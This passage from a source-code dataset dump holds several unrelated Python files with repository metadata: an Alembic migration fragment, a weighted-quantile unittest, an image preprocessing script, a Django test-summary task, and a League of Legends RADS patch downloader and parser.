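    # string rather than restoring the enum.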
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('Tile', sa.Column('status', sa.String(255), nullable=False, default="raw"))
# ### end Alembic commands ###
| 24.806452 | 93 | 0.687906 | 99 | 769 | 5.282828 | 0.525253 | 0.051625 | 0.080306 | 0.087954 | 0.474187 | 0.474187 | 0.474187 | 0.474187 | 0.309751 | 0.309751 | 0 | 0.087227 | 0.16515 | 769 | 30 | 94 | 25.633333 | 0.727414 | 0.394018 | 0 | 0.181818 | 0 | 0 | 0.13986 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.181818 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3e8a25b886e2dd3e93fc2e6fa0f2a2bcc470b21 | 2,224 | py | Python | tests/test_wquantile.py | nailbiter/alex_python_toolbox | e9624db00f5dc3c1a83b87bc267eff1e3f96aea5 | [
"MIT"
] | null | null | null | tests/test_wquantile.py | nailbiter/alex_python_toolbox | e9624db00f5dc3c1a83b87bc267eff1e3f96aea5 | [
"MIT"
] | 1 | 2021-11-15T23:18:39.000Z | 2021-11-15T23:18:39.000Z | tests/test_wquantile.py | nailbiter/alex_python_toolbox | e9624db00f5dc3c1a83b87bc267eff1e3f96aea5 | [
"MIT"
] | null | null | null | """===============================================================================
FILE: tests/test_wquantile.py
USAGE: (not intended to be directly executed)
DESCRIPTION:
OPTIONS: ---
REQUIREMENTS: ---
BUGS: ---
NOTES: ---
AUTHOR: Alex Leontiev (nailbiter@dtws-work.in)
ORGANIZATION: Datawise Inc.
VERSION: ---
CREATED: 2020-11-13T10:34:23.399352
REVISION: ---
==============================================================================="""
import logging
import unittest
from alex_python_toolbox.wquantile import wquantile
from random import uniform
import pandas as pd
import json
from os import path
class TestWquantile(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._logger = logging.getLogger(self.__class__.__name__)
_TEST_DATA_FN = path.join(path.dirname(
__file__), ".test_wquantile.data.json")
def _generate_random_test_data(self, test_cases_num=5, quantile_trials=10):
num_rows = int(uniform(5, 15))
res = []
for i in range(test_cases_num):
df = pd.DataFrame(
[{"value": int(uniform(5, 15)), "weight": uniform(5, 15)} for j in range(num_rows)])
quantiles = [uniform(0, 1) for i in range(quantile_trials)]
res.append({"df": df.to_dict(), "data": [{"quantile": quantile,
"res": wquantile(zip(df["value"], df["weight"]), [quantile])} for quantile in quantiles]})
with open(TestWquantile._TEST_DATA_FN, "w") as f:
json.dump(res, f, indent=2, sort_keys=True)
def test_wquantile(self):
# self._generate_random_test_data()
with open(TestWquantile._TEST_DATA_FN) as f:
test_data = json.load(f)
for r in test_data:
#self.assertEqual(wquantile(pd.DataFrame({"value":r["df"]["value"],"weight":r["df"]["weight"]}),q=r["quantile"]), r["res"])
res = wquantile(zip(r["df"]["value"].values(), r["df"]["weight"].values()), [
r_["quantile"] for r_ in r["data"]])
self.assertListEqual(res, [r_["res"] for r_ in r["data"]])
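def _example_wquantile_equal_weights():
    # A minimal sketch, assuming the (value, weight)-pairs / quantile-list
    # calling convention exercised above: with equal weights, the weighted
    # median should fall inside the data range.
    (median,) = wquantile([(1, 1.0), (2, 1.0), (3, 1.0)], [0.5])
    assert 1 <= median <= 3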
| 37.694915 | 144 | 0.553507 | 260 | 2,224 | 4.507692 | 0.411538 | 0.047782 | 0.025597 | 0.037543 | 0.071672 | 0.052901 | 0 | 0 | 0 | 0 | 0 | 0.020528 | 0.233363 | 2,224 | 58 | 145 | 38.344828 | 0.666862 | 0.294964 | 0 | 0 | 0 | 0 | 0.063421 | 0.016015 | 0 | 0 | 0 | 0 | 0.032258 | 1 | 0.096774 | false | 0 | 0.225806 | 0 | 0.387097 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3ed1e109e8b2ec28f7a697722de818e6a4cde1f | 912 | py | Python | prepare.py | mukherjeeakash/GestureRecognizer | 51c16c9b7c2d32fc6cdcc90bd251f7b131b9e821 | [
"Apache-2.0"
] | null | null | null | prepare.py | mukherjeeakash/GestureRecognizer | 51c16c9b7c2d32fc6cdcc90bd251f7b131b9e821 | [
"Apache-2.0"
] | null | null | null | prepare.py | mukherjeeakash/GestureRecognizer | 51c16c9b7c2d32fc6cdcc90bd251f7b131b9e821 | [
"Apache-2.0"
] | null | null | null | path = 'C:\\Users\\akash\\Pictures\\Sign-Language-Digits-Dataset-master\\Dataset\\'
import os
from PIL import Image
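# For each digit-class folder (0-2): convert every image to grayscale ('L'),
# save a left-right mirrored copy (prefixed 'r_') and the original-orientation
# copy under the parallel 'grayscale' tree; then repeat for 'invalid'.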
for i in range(3):
for filename in os.listdir(path + str(i)):
if filename != "":
image_obj = Image.open(path + str(i) + "\\" + filename).convert('L')
rotated_image = image_obj.transpose(Image.FLIP_LEFT_RIGHT)
rotated_image.save(path + "grayscale\\" + str(i) + "\\r_" + filename)
image_obj.save(path + "grayscale\\" + str(i) + "\\" + filename)
for filename in os.listdir(path + "invalid"):
if filename != "":
image_obj = Image.open(path + "invalid" + "\\" + filename).convert('L')
rotated_image = image_obj.transpose(Image.FLIP_LEFT_RIGHT)
rotated_image.save(path + "grayscale\\" + "invalid" + "\\r_" + filename)
image_obj.save(path + "grayscale\\" + "invalid" + "\\" + filename) | 50.666667 | 84 | 0.593202 | 110 | 912 | 4.772727 | 0.336364 | 0.091429 | 0.121905 | 0.057143 | 0.712381 | 0.697143 | 0.598095 | 0.350476 | 0.350476 | 0.350476 | 0 | 0.001425 | 0.230263 | 912 | 18 | 85 | 50.666667 | 0.746439 | 0 | 0 | 0.25 | 0 | 0 | 0.179628 | 0.081051 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3f25d0874f1f41b96cf0db0cf82de3fe58fb7d7 | 4,409 | py | Python | care/facility/summarisation/tests_summary.py | gigincg/care | 07be6a7982b5c46a854e3435a52662f32800c8ae | [
"MIT"
] | 189 | 2020-03-17T17:18:58.000Z | 2022-02-22T09:49:45.000Z | care/facility/summarisation/tests_summary.py | gigincg/care | 07be6a7982b5c46a854e3435a52662f32800c8ae | [
"MIT"
] | 598 | 2020-03-19T21:22:09.000Z | 2022-03-30T05:08:37.000Z | care/facility/summarisation/tests_summary.py | gigincg/care | 07be6a7982b5c46a854e3435a52662f32800c8ae | [
"MIT"
] | 159 | 2020-03-19T18:45:56.000Z | 2022-03-17T13:23:12.000Z | from celery.decorators import periodic_task
from celery.schedules import crontab
from django.core.exceptions import ObjectDoesNotExist
from django.utils import timezone
from django.utils.decorators import method_decorator
from django.views.decorators.cache import cache_page
from django_filters import rest_framework as filters
from rest_framework.mixins import ListModelMixin
from rest_framework.permissions import IsAuthenticatedOrReadOnly
from rest_framework.viewsets import GenericViewSet
from care.facility.models import Facility, FacilityRelatedSummary, PatientSample
from care.facility.summarisation.facility_capacity import FacilitySummaryFilter, FacilitySummarySerializer
class TestsSummaryViewSet(ListModelMixin, GenericViewSet):
lookup_field = "external_id"
queryset = FacilityRelatedSummary.objects.filter(s_type="TestSummary").order_by("-created_date")
permission_classes = (IsAuthenticatedOrReadOnly,)
serializer_class = FacilitySummarySerializer
filter_backends = (filters.DjangoFilterBackend,)
filterset_class = FacilitySummaryFilter
# def get_queryset(self):
# user = self.request.user
# queryset = self.queryset
# if user.is_superuser:
# return queryset
# elif self.request.user.user_type >= User.TYPE_VALUE_MAP["DistrictReadOnlyAdmin"]:
# return queryset.filter(facility__district=user.district)
# elif self.request.user.user_type >= User.TYPE_VALUE_MAP["StateReadOnlyAdmin"]:
# return queryset.filter(facility__state=user.state)
# return queryset.filter(facility__users__id__exact=user.id)
    @method_decorator(cache_page(60 * 60 * 10))
def dispatch(self, request, *args, **kwargs):
return super().dispatch(request, *args, **kwargs)
def tests_summary():
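    """Build per-facility test-count statistics and persist them as a daily
    'TestSummary' row, updating today's existing row only when the data has
    changed."""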
facilities = Facility.objects.all()
for facility in facilities:
facility_total_patients_count = facility.consultations.all().distinct("patient_id").count()
facility_patients_samples = PatientSample.objects.filter(consultation__facility_id=facility.id)
total_tests_count = facility_patients_samples.count()
results_positive_count = facility_patients_samples.filter(
result=PatientSample.SAMPLE_TEST_RESULT_MAP["POSITIVE"]
).count()
results_awaited_count = facility_patients_samples.filter(
result=PatientSample.SAMPLE_TEST_RESULT_MAP["AWAITING"]
).count()
results_negative_count = facility_patients_samples.filter(
result=PatientSample.SAMPLE_TEST_RESULT_MAP["NEGATIVE"]
).count()
test_discarded_count = facility_patients_samples.filter(
result=PatientSample.SAMPLE_TEST_RESULT_MAP["INVALID"]
).count()
facility_tests_summarised_data = {
"facility_name": facility.name,
"district": facility.district.name,
"total_patients": facility_total_patients_count,
"total_tests": total_tests_count,
"result_positive": results_positive_count,
"result_awaited": results_awaited_count,
"result_negative": results_negative_count,
"test_discarded": test_discarded_count,
}
try:
facility_test_summary = FacilityRelatedSummary.objects.get(
s_type="TestSummary", created_date__startswith=timezone.now().date(), facility=facility
)
facility_test_summary.created_date = timezone.now()
facility_test_summary.data.pop("modified_date")
if not facility_test_summary.data == facility_tests_summarised_data:
facility_test_summary.data = facility_tests_summarised_data
latest_modification_date = timezone.now()
facility_test_summary.data.update(
{"modified_date": latest_modification_date.strftime("%d-%m-%Y %H:%M")}
)
facility_test_summary.save()
except ObjectDoesNotExist:
modified_date = timezone.now()
facility_tests_summarised_data.update({"modified_date": modified_date.strftime("%d-%m-%Y %H:%M")})
FacilityRelatedSummary.objects.create(
s_type="TestSummary", facility=facility, data=facility_tests_summarised_data
)
@periodic_task(run_every=crontab(hour=23, minute=59))
def run_midnight():
tests_summary()
| 46.904255 | 110 | 0.714901 | 459 | 4,409 | 6.544662 | 0.294118 | 0.034621 | 0.044274 | 0.055925 | 0.216378 | 0.194407 | 0.194407 | 0.15779 | 0.124501 | 0.124501 | 0 | 0.002835 | 0.200045 | 4,409 | 93 | 111 | 47.408602 | 0.84888 | 0.110456 | 0 | 0.055556 | 0 | 0 | 0.06878 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041667 | false | 0 | 0.166667 | 0.013889 | 0.319444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3f8d6b9c7c673105416ad9c741ad2b778d84b31 | 23,272 | py | Python | bdragon/cdragontoolbox/rads.py | headbangsmurf/CommunityDataDragon | cc3307280dbaf61b4a2cab4bc953edb192a077bb | [
"MIT"
] | 3 | 2020-11-10T19:37:41.000Z | 2022-03-18T11:37:15.000Z | bdragon/cdragontoolbox/rads.py | headbangsmurf/CommunityDataDragon | cc3307280dbaf61b4a2cab4bc953edb192a077bb | [
"MIT"
] | 1 | 2020-11-30T00:46:44.000Z | 2020-11-30T06:57:19.000Z | bdragon/cdragontoolbox/rads.py | headbangsmurf/CommunityDataDragon | cc3307280dbaf61b4a2cab4bc953edb192a077bb | [
"MIT"
] | null | null | null | import os
import re
import zlib
from typing import List, Dict, Union, Optional, Generator, Iterable
from collections import defaultdict
import logging
import requests
from .data import Language
from .tools import write_file_or_remove
from .storage import (
BaseVersion,
Storage,
Patch,
PatchElement,
PatchVersion,
get_system_yaml_version,
get_exe_version,
)
logger = logging.getLogger(__name__)
class RadsVersion(BaseVersion):
"""Wrapper class for version strings used by RADS
Solutions and projects all have individual version numbers (e.g. "0.0.1.30").
The version numbers are actually 32-bit unsigned integers represented using dot-notation, exactly the same as the
notation used for IPv4 addresses. Notably, each individual number caps at 255, so the version after 0.0.0.255 is
0.0.1.0.
"""
def __init__(self, v: Union[str, tuple]):
super().__init__(v)
        assert len(self.t) == 4, f"invalid RADS version format: {v}"
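def _example_rads_version_ordering():
    # A minimal sketch, assuming BaseVersion provides tuple-wise ordering (as
    # its use with sorted() below suggests): each dotted component is an
    # integer, so 0.0.1.0 sorts after 0.0.0.255.
    assert RadsVersion("0.0.1.0") > RadsVersion("0.0.0.255")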
class RadsStorage(Storage):
"""
Storage based on RADS structure
Configuration options:
url -- storage URL (see examples below)
cdn -- 'default', 'kr' or 'pbe' (incompatible with 'url')
"""
storage_type = 'rads'
# all available values are in system.yaml
# values in use are in RADS/system/system.cfg
# region is ignored here (it is not actually needed)
DOWNLOAD_URL = "l3cdn.riotgames.com"
DOWNLOAD_PATH = "/releases/live"
DOWNLOAD_PATH_KR = "/KR_CBT"
DOWNLOAD_PATH_PBE = "/releases/pbe"
URL_DEFAULT = f"http://{DOWNLOAD_URL}{DOWNLOAD_PATH}/"
URL_KR = f"http://{DOWNLOAD_URL}{DOWNLOAD_PATH_KR}/"
URL_PBE = f"http://{DOWNLOAD_URL}{DOWNLOAD_PATH_PBE}/"
def __init__(self, path, url=None):
if url is None:
url = self.URL_DEFAULT
super().__init__(path, url)
@classmethod
def from_conf_data(cls, conf):
if 'cdn' in conf:
if 'url' in conf:
raise ValueError("'url' and 'cdn' are mutually exclusive")
url = getattr(cls, f"URL_{conf['cdn']}".upper())
else:
url = conf.get('url')
return cls(conf['path'], url)
def list_projects(self) -> List['RadsProject']:
"""List projects present in storage"""
ret = []
base = self.fspath("projects")
for name in os.listdir(base):
if os.path.isdir(f"{base}/{name}/releases"):
ret.append(RadsProject(self, name))
return ret
def list_solutions(self) -> List['RadsSolution']:
"""List solutions present in storage"""
ret = []
base = self.fspath("solutions")
for name in os.listdir(base):
if os.path.isdir(f"{base}/{name}/releases"):
ret.append(RadsSolution(self, name))
return ret
def patch_elements(self, stored=False):
solution_names = ('league_client_sln', 'lol_game_client_sln')
# peek next element for each solution
class Peeker:
def __init__(self, it):
self.it = it
self.cur = None
def peek(self):
if self.cur is None:
try:
self.cur = next(self.it)
except StopIteration:
pass
return self.cur
def consume(self):
assert self.cur is not None
self.cur = None
# drop solution versions without a patch
# convert them to patch elements
def gen_solution_elements(name):
solution = RadsSolution(self, name)
for sv in solution.versions(stored=stored):
patch = sv.patch_version()
if patch is None:
continue
yield RadsPatchElement(sv)
# for each solution, peek the next elements to yield the highest version
peekers = [Peeker(gen_solution_elements(name)) for name in solution_names]
while True:
best_peeker, best_elem = None, None
for peeker in peekers:
elem = peeker.peek()
if elem is None:
continue
if best_elem is None or elem.version > best_elem.version:
best_peeker, best_elem = peeker, elem
if best_peeker is None:
break # exhausted
yield best_elem
best_peeker.consume()
class RadsSolution:
"""A Solution has multiple versions and contains many Projects.
The Riot Application Distribution System (RADS) has two Solutions: `league_client_sln` and `lol_game_client_sln`.
    The `league_client_sln` solution contains data for the client (LCU), and the `lol_game_client_sln` solution contains data for the game client.
These classes will likely work with other solutions, although some functionality may need to be extended.
There are multiple versions of a given solution, which can be accessed via the `.versions()` method.
All versions of a solution can be downloaded and extracted via the `.download()` method.
Each version of a solution contains multiple projects pertaining to different locales.
"""
def __init__(self, storage: RadsStorage, name):
self.storage = storage
self.path = f"solutions/{name}/releases"
self.name = name
def __str__(self):
return f"rads:{self.name}"
def __repr__(self):
return f"<{self.__class__.__qualname__} {self.name}>"
def __eq__(self, other):
if isinstance(other, RadsSolution):
return self.name == other.name
return False
def __hash__(self):
return hash(self.name)
def __lt__(self, other):
if isinstance(other, RadsSolution):
return self.name < other.name
return NotImplemented
def versions(self, stored=False) -> List['RadsSolutionVersion']:
"""Retrieve a sorted list of versions of this solution
If stored is True, only versions in storage are used (to avoid downloading new files).
"""
if stored:
fspath = self.storage.fspath(self.path)
if not os.path.isdir(fspath):
return [] # solution not in storage
listing = []
for path in os.listdir(fspath):
if not os.path.isdir(os.path.join(fspath, path)):
continue
listing.append(path)
else:
logger.debug(f"retrieve versions of {self}")
listing = self.storage.request_text(f"{self.path}/releaselisting").splitlines()
return sorted(RadsSolutionVersion(self, RadsVersion(l)) for l in listing)
def download(self, langs):
for v in self.versions():
v.download(langs)
class RadsSolutionVersion:
"""A single version of a RadsSolution.
Each RadsSolutionVersion contains data for multiple projects, accessible via the `RadsSolutionVersion.projects` method.
There is one "main" project, and one project for each language.
The data contained in a RadsSolutionVersion can be downloaded and extracted via the `.download()` method.
"""
def __init__(self, solution: RadsSolution, version: 'RadsVersion'):
self.path = f"{solution.path}/{version}"
self.solution = solution
self.version = version
def __str__(self):
return f"{self.solution}={self.version}"
def __repr__(self):
return f"<{self.__class__.__qualname__} {self.solution.name}={self.version}>"
def __eq__(self, other):
if isinstance(other, RadsSolutionVersion):
return self.solution == other.solution and self.version == other.version
return False
def __hash__(self):
return hash((self.solution, self.version))
def __lt__(self, other):
if isinstance(other, RadsSolutionVersion):
if self.solution < other.solution:
return True
elif self.solution == other.solution:
return self.version > other.version
else:
return False
return NotImplemented
def dependencies(self) -> Dict[Union[Language, None], List['RadsProjectVersion']]:
"""Parse dependencies from the solutionmanifest
Return a map of project versions for each language.
The entry None is set to all required project versions.
"""
logger.debug(f"retrieve dependencies of {self}")
path = f"{self.path}/solutionmanifest"
self.solution.storage.download(path, path)
with open(self.solution.storage.fspath(path)) as f:
lines = f.read().splitlines()
assert lines[0] == "RADS Solution Manifest", "unexpected solutionmanifest magic line"
assert lines[1] == "1.0.0.0", "unexpected solutionmanifest version"
assert lines[2] == self.solution.name, "solution name mismatch in solutionmanifest header"
assert lines[3] == self.version, "solution version mismatch in solutionmanifest header"
idx = 4
required_projects = [] # [name, ...]
projects = {} # {name: RadsProjectVersion}
nprojects, idx = int(lines[idx]), idx + 1
for _ in range(nprojects):
(name, version, unk1, unk2), idx = lines[idx:idx+4], idx + 4
unk1, unk2 = int(unk1), int(unk2)
if unk1 == 0:
required_projects.append(name)
else:
assert unk1 == 10
assert unk2 == 0
projects[name] = RadsProjectVersion(RadsProject(self.solution.storage, name), RadsVersion(version))
langs = {} # {Language: [RadsProjectVersion, ...]}
nlangs, idx = int(lines[idx]), idx + 1
for _ in range(nlangs):
(lang, unk1, ndeps), idx = lines[idx:idx+3], idx + 3
unk1, ndeps = int(unk1), int(ndeps)
assert unk1 == 0
deps, idx = lines[idx:idx+ndeps], idx + ndeps
langs[Language(lang)] = [projects[name] for name in deps]
langs[None] = list(projects[name] for name in required_projects)
return langs
def projects(self, langs=True) -> List['RadsProjectVersion']:
"""Return a list of projects for provided language(s)"""
dependencies = self.dependencies()
if langs is False:
return dependencies[None]
elif langs is True:
return list({pv for pvs in dependencies.values() for pv in pvs})
elif isinstance(langs, Language):
return dependencies[langs]
else:
return list({pv for lang in langs for pv in dependencies[lang]})
def filepaths(self, langs) -> Generator[str, None, None]:
"""Generate the extract path of files in the solution version"""
for pv in self.projects(langs):
yield from pv.filepaths()
def download(self, langs=True):
"""Download solution version files"""
logger.info(f"downloading solution {self}")
for pv in self.projects(langs):
pv.download()
def patch_version(self) -> Optional[PatchVersion]:
"""Return patch version or None if there is None
This method reads/writes version from/to cache.
"""
# for PBE: version is always "main"
if self.solution.storage.url == RadsStorage.URL_PBE:
return PatchVersion("main")
cache = self.solution.storage.fspath(f"{self.path}/_patch_version")
if os.path.isfile(cache):
logger.debug(f"retrieving patch version for {self} from cache")
with open(cache) as f:
version = f.read().strip()
version = PatchVersion(version) if version else None
else:
version = self._retrieve_patch_version()
if version is None:
logger.warning(f"failed to retrieve patch version for {self}")
else:
with open(cache, 'w') as f:
f.write(f"{version}\n")
return version
def _retrieve_patch_version(self) -> Optional[PatchVersion]:
"""Retrieve patch version from game files (no cache handling)
Return None if there is no patch version (because files are not
available anymore on Riot's CDN).
Raise an exception if patch version cannot be retrieved.
"""
logger.debug(f"retrieving patch version for {self}")
retrievers = {
# solution_name: (project_name, file_name, extractor)
'league_client_sln': (
'league_client',
'system.yaml',
get_system_yaml_version,
),
'lol_game_client_sln': (
'lol_game_client',
'League of Legends.exe',
get_exe_version,
),
}
try:
project_name, file_name, extractor = retrievers[self.solution.name]
except KeyError:
raise RuntimeError(f"no known way to retrieve patch version for solution {self.solution.name}")
for pv in self.projects(False):
if pv.project.name == project_name:
break
else:
raise ValueError(f"{project_name} project not found for {self}")
try:
filepaths = pv.filepaths()
except requests.exceptions.HTTPError as e:
# some packagemanifest files are not available anymore
# for these project versions, there is no patch version
if e.response is not None and e.response.status_code == 404:
return None
raise
path_suffix = f'/{file_name}'
for path in filepaths:
if path.endswith(path_suffix):
fspath = self.solution.storage.fspath(path)
if not os.path.isfile(path):
pv.extract([path])
break
else:
# packagemanifest for league_client<=0.0.0.43 doesn't alway contain system.yaml
if pv.project.name == 'league_client' and pv.version <= RadsVersion('0.0.0.43'):
return None
raise ValueError(f"'{file_name}' not found for {pv}")
version = extractor(fspath)
return PatchVersion(version)
class RadsProject:
"""A RadsProject is a subset of data for a specific locale, or the data for the main/default/common locale.
There are multiple versions of a given project, which can be accessed via the `.versions()` method.
All versions of the project can be downloaded and extracted via the `.download()` method.
The data in ProjectVersions are contained in Bin files, which are extracted.
"""
def __init__(self, storage: RadsStorage, name):
self.storage = storage
self.path = f"projects/{name}/releases"
self.name = name
def __str__(self):
return f"rads:{self.name}"
def __repr__(self):
return f"<{self.__class__.__qualname__} {self.name}>"
def __eq__(self, other):
if isinstance(other, RadsProject):
return self.name == other.name
return False
def __hash__(self):
return hash(self.name)
def __lt__(self, other):
if isinstance(other, RadsProject):
return self.name < other.name
return NotImplemented
def versions(self) -> List['RadsProjectVersion']:
"""Retrieve the list of versions of this project"""
logger.debug(f"retrieve versions of {self}")
listing = self.storage.request_text(f"{self.path}/releaselisting")
return [RadsProjectVersion(self, RadsVersion(l)) for l in listing.splitlines()]
def download(self):
for v in self.versions():
v.download()
class RadsProjectVersion:
"""A single version of a RadsProject.
The data contained in a project can be downloaded and extracted via the `.download()` method.
The data in these ProjectVersions are contained in Bin files, which are extracted.
"""
def __init__(self, project: RadsProject, version: 'Version'):
self.path = f"{project.path}/{version}"
self.project = project
self.version = version
self._package_files = None # {extract_path: BinPackageFile}
def __str__(self):
return f"{self.project}={self.version}"
def __repr__(self):
return f"<{self.__class__.__qualname__} {self.project.name}={self.version}>"
def __eq__(self, other):
if isinstance(other, RadsProjectVersion):
return self.project == other.project and self.version == other.version
return False
def __hash__(self):
return hash((self.project, self.version))
def __lt__(self, other):
if isinstance(other, RadsProjectVersion):
if self.project < other.project:
return True
elif self.project == other.project:
return self.version > other.version
else:
return False
return NotImplemented
def _get_package_files(self) -> Dict[str, 'BinPackageFile']:
"""Retrieve files from packagemanifest"""
if self._package_files is None:
manifest_path = f"{self.path}/packagemanifest"
manifest_urlpath = f"{self.path}/packages/files/packagemanifest"
self.project.storage.download(manifest_urlpath, manifest_path)
files = BinPackageFile.from_package_manifest(self.project.storage.fspath(manifest_path))
self._package_files = {pf.extract_path: pf for pf in files}
return self._package_files
def filepaths(self) -> Dict[str, 'BinPackageFile']:
"""Generate the extract path of files in the project version"""
return self._get_package_files()
def extract(self, paths=None):
"""Download packages and extract files
A subset of paths to extract can be provided (they must exist in the project version).
"""
all_files = self._get_package_files()
if paths is None:
extracted_files = all_files.values()
else:
extracted_files = [all_files[path] for path in paths]
# filter already extracted file
extracted_files = [pf for pf in extracted_files if not os.path.isfile(self.project.storage.fspath(pf.extract_path))]
# group files by package
files_by_package = defaultdict(list)
for pf in extracted_files:
files_by_package[pf.package].append(pf)
package_files_path = f"{self.path}/packages/files"
for package, files in files_by_package.items():
with self.project.storage.stream(f"{package_files_path}/{package}") as reader:
# sort files by offset to extract while streaming the bin file
for pkgfile in sorted(files, key=lambda f: f.offset):
logger.debug(f"extracting {pkgfile.path}")
reader.skip_to(pkgfile.offset)
fspath = self.project.storage.fspath(pkgfile.extract_path)
with write_file_or_remove(fspath) as fout:
if pkgfile.compressed:
zobj = zlib.decompressobj(zlib.MAX_WBITS | 32)
def writer(data):
return fout.write(zobj.decompress(data))
reader.copy(writer, pkgfile.size)
fout.write(zobj.flush())
else:
reader.copy(fout.write, pkgfile.size)
def download(self):
"""Download project version files"""
logger.info(f"downloading project {self}")
self.project.storage.download(f"{self.path}/releasemanifest", None)
self.extract()
class RadsPatchElement(PatchElement):
"""Patch element from a RADS storage"""
solution_name_to_element_name = {
'league_client_sln': 'client',
'lol_game_client_sln': 'game',
}
def __init__(self, sv: RadsSolutionVersion):
name = self.solution_name_to_element_name[sv.solution.name]
version = sv.patch_version()
if version is None:
raise ValueError(f"unknown patch version for {sv}")
super().__init__(name, version)
self.solution_version = sv
def download(self, langs=True):
self.solution_version.download(langs=langs)
def fspaths(self, langs=True):
sv = self.solution_version
storage = sv.solution.storage
return (storage.fspath(path) for path in sv.filepaths(langs=langs))
def relpaths(self, langs=True):
sv = self.solution_version
return (path.split('/', 5)[5].lower() for path in sv.filepaths(langs=langs))
def paths(self, langs=True):
sv = self.solution_version
storage = sv.solution.storage
for path in sv.filepaths(langs=langs):
yield (storage.fspath(path), path.split('/', 5)[5].lower())
class BinPackageFile:
"""A single file in a BIN package"""
__slots__ = ('path', 'package', 'offset', 'size', 'compressed', 'extract_path')
def __init__(self, line):
path, self.package, offset, size, typ = line.split(',')
self.path = path[1:] # remove leading '/'
self.offset = int(offset)
self.size = int(size)
self.compressed = self.path.endswith('.compressed')
if self.compressed:
self.extract_path = self.path[:-11] # remove the '.compressed' suffix
else:
self.extract_path = self.path
def __str__(self):
return f"<{self.__class__.__name__} {self.path!r}>"
@classmethod
def from_package_manifest(cls, path) -> Generator['BinPackageFile', None, None]:
with open(path) as f:
line = f.readline()
assert line.startswith('PKG1'), "unexpected packagemanifest magic line"
for line in f:
yield cls(line)
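# Example of the packagemanifest format consumed above (illustrative line,
# reconstructed from the parsing logic rather than copied from a real manifest):
#   PKG1
#   /0.0.1.0/files/foo.txt.compressed,BIN_0001,0,1234,3
# BinPackageFile parses this into path='0.0.1.0/files/foo.txt.compressed',
# package='BIN_0001', offset=0, size=1234, compressed=True, and
# extract_path='0.0.1.0/files/foo.txt'.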
def parse_rads_component(storage: RadsStorage, component: str):
"""Parse a component string representation to an object"""
m = re.match(r'^(?:([sp]):)?(\w+)(?:=(|[0-9]+(?:\.[0-9]+)*|main)?)?$', component)
if not m:
raise ValueError(f"invalid component: {component}")
typ, name, version = m.group(1, 2, 3)
if not typ:
if name == 'patch':
typ = 'patch'
elif name.endswith('_sln'):
typ = 's'
else:
typ = 'p'
if typ == 'p':
project = RadsProject(storage, name)
if version is None:
return project
elif version == '':
return project.versions()[0]
else:
return RadsProjectVersion(project, RadsVersion(version))
elif typ == 's':
solution = RadsSolution(storage, name)
if version is None:
return solution
elif version == '':
return solution.versions()[0]
else:
return RadsSolutionVersion(solution, RadsVersion(version))
elif typ == 'patch':
if version is None:
            raise ValueError("patch requires a version")
elif version == '':
return storage.patch(None)
else:
return storage.patch(version)
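# Example component strings accepted by parse_rads_component() (values are
# hypothetical; `storage` is assumed to be a configured RadsStorage):
#   parse_rads_component(storage, "p:lol_game_client")        -> RadsProject
#   parse_rads_component(storage, "lol_game_client=0.0.1.68") -> RadsProjectVersion
#   parse_rads_component(storage, "league_client_sln=")       -> latest RadsSolutionVersion
#   parse_rads_component(storage, "patch=7.24")               -> storage.patch("7.24")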
| 36.419405 | 124 | 0.606179 | 2,739 | 23,272 | 5.016429 | 0.147499 | 0.020087 | 0.007205 | 0.012227 | 0.309534 | 0.232096 | 0.204731 | 0.17329 | 0.157569 | 0.140539 | 0 | 0.005354 | 0.293744 | 23,272 | 638 | 125 | 36.476489 | 0.830616 | 0.181849 | 0 | 0.297483 | 0 | 0 | 0.124143 | 0.039042 | 0 | 0 | 0 | 0 | 0.022883 | 1 | 0.132723 | false | 0.002288 | 0.022883 | 0.032037 | 0.343249 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3fb508751b27387b839402708cd6c7d5ae12cf0 | 935 | py | Python | venv/lib/python3.8/site-packages/arch/tests/bootstrap/test_block_length.py | johncollinsai/post-high-frequency-data | 88533b0e0afc7e7f82fee1d3ca4b68abc30aaeb4 | [
"MIT"
] | 1 | 2022-03-29T22:12:54.000Z | 2022-03-29T22:12:54.000Z | venv/lib/python3.8/site-packages/arch/tests/bootstrap/test_block_length.py | johncollinsai/post-high-frequency-data | 88533b0e0afc7e7f82fee1d3ca4b68abc30aaeb4 | [
"MIT"
] | null | null | null | venv/lib/python3.8/site-packages/arch/tests/bootstrap/test_block_length.py | johncollinsai/post-high-frequency-data | 88533b0e0afc7e7f82fee1d3ca4b68abc30aaeb4 | [
"MIT"
] | null | null | null | import numpy as np
from numpy.testing import assert_allclose
import pandas as pd
from arch.bootstrap.base import optimal_block_length
